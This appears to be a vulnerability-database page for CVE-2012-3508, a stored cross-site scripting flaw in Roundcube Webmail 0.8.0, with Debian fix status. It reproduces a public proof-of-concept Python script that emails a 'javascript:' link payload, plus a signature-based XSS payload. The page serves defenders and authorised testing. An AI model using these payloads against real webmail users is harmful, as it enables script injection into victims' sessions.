CVE-2012-3508

medium

Published 2012-08-25 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

5.3

Description

Cross-site scripting (XSS) vulnerability in program/lib/washtml.php in Roundcube Webmail 0.8.0 allows remote attackers to inject arbitrary web script or HTML by using "javascript:" in an href attribute in the body of an HTML-formatted email.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-20549 webapps php verified python · 3 KB

Shai rod · 2012-08-16

Roundcube Webmail 0.8.0 - Persistent Cross-Site Scripting

python exploit Source: Exploit-DB

#!/usr/bin/python

'''
# Exploit Title: Roundcube Webmail Stored XSS.
# Date: 14/08/2012
# Exploit Author: Shai rod (@NightRang3r)
# Vendor Homepage: http://roundcube.net
# Software Link: http://sourceforge.net/projects/roundcubemail/files/roundcubemail/0.8.0/roundcubemail-0.8.0.tar.gz/download
# Version: 0.8.0


#Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar

# Timeline:
#14 Aug 2012: Discovered Vulnerability.
#14 Aug 2012: Opened Ticket #1488613 - http://trac.roundcube.net/ticket/1488613
#15 Aug 2012: Fix added to repo.

https://github.com/roundcube/roundcubemail/commit/c086978f6a91eacb339fd2976202fca9dad2ef32
https://github.com/roundcube/roundcubemail/commit/5ef8e4ad9d3ee8689d2b83750aa65395b7cd59ee


About the Application:
======================

Roundcube is a free and open source webmail solution with a desktop-like user interface which is easy to install/configure and that runs on a standard LAMPP
server. The skins use the latest web standards such as XHTML and CSS 2. Roundcube includes other sophisticated open-source libraries such as PEAR,
an IMAP library derived from IlohaMail the TinyMCE rich text editor, Googiespell library for spell checking or the WasHTML sanitizer by Frederic Motte.

Vulnerability Description
=========================

1. Stored XSS in e-mail body.

XSS Payload: <a href=javascript:alert("XSS")>POC MAIL</a>

Send an email to the victim with the payload in the email body, Once the user clicks on the url the XSS should be triggered.

2. Self XSS in e-mail body (Signature).

XSS Payload: "><img src='1.jpg'onerror=javascript:alert("XSS")>

In order to trigger this XSS you should insert the payload into your signature.

Settings -> Identities -> Your Identitiy -> Signature
Now create a new mail, XSS Should be triggered.

'''

import smtplib

print "###############################################"
print "#       Roundcube 0.8.0 Stored XSS POC        #"
print "#             Coded by: Shai rod              #"
print "#               @NightRang3r                  #"
print "#           http://exploit.co.il              #"
print "#       For Educational Purposes Only!        #"
print "###############################################\r\n"

# SETTINGS

sender = "attacker@localhost"
smtp_login = sender
smtp_password = "qwe123"
recipient = "victim@localhost"
smtp_server  = "192.168.1.10"
smtp_port = 25
subject = "Roundcube Webmail XSS POC"


# SEND E-MAIL

print "[*] Sending E-mail to " + recipient + "..."
msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n"
       % (sender, ", ".join(recipient), subject) )
msg += "Content-type: text/html\n\n"
msg += """<a href=javascript:alert("XSS")>Click Me, Please...</a>\r\n"""
server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo()
server.starttls()
server.login(smtp_login, smtp_password)
server.sendmail(sender, recipient, msg)
server.quit()
print "[+] E-mail sent!"

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`0.7.2-4`
sid	Fixed	`0.7.2-4`
forky	Fixed	`0.7.2-4`
bullseye	Fixed	`0.7.2-4`
bookworm	Fixed	`0.7.2-4`

Application impact

Vendor	Product	Versions	Fixed
roundcube	webmail	`0.8.0`

References

CWEs

CWE-79

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.